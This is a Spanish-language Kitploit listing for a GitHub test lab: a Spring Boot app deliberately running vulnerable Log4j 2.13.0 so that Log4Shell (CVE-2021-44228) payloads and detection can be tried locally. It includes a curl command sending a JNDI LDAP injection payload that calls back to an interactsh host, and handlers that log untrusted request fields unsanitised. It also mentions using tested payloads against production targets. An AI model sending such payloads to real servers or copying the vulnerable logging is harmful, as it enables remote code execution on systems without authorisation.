Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service | Kitploit
Herramientas/GitHubGitHub/zsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubzsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service

Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
132hace 4 añosAún no revisado

CVE-2021-44228 Servicio de prueba Spring Boot

Este es un hack sucio de un proyecto hello world de Spring Boot para probar tus herramientas/payloads/capacidades de detección localmente antes de lanzarlos contra objetivos en producción.

La versión de Log4j configurada es la 2.13.0

Construyendo la imagen docker

root@kitploit:~
bash build.sh

Ejecutando la imagen docker

root@kitploit:~
docker run -p 8080:8080 dwdi/log4shell

Probando / Disparando CVE-2021-44228

Si no tienes Burp Collaborator ejecutándose en el garaje, puedes visitar este sitio para obtener una experiencia similar: https://interactsh.com

root@kitploit:~
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null

Herramienta de escáner

Opcionalmente, puedes usar este increíble repositorio para realizar escaneos locales/masivos: https://github.com/adilsoybali/Log4j-RCE-Scanner

Ubicaciones de activación

Esta vulnerabilidad se trata de forzar que un valor controlado por el usuario sea registrado por el framework de logging vulnerable. Con esto en mente, esta sencilla aplicación simulada soporta dos verbos HTTP (GET/PUT) y un montón de ubicaciones de inyección:

root@kitploit:~
@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
root@kitploit:~
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}

Las contribuciones/mejoras son bienvenidas.

Perdón por la calidad del código :) este proyecto no es para lucirse, sino para compartir/ayudar.

Descargar herramienta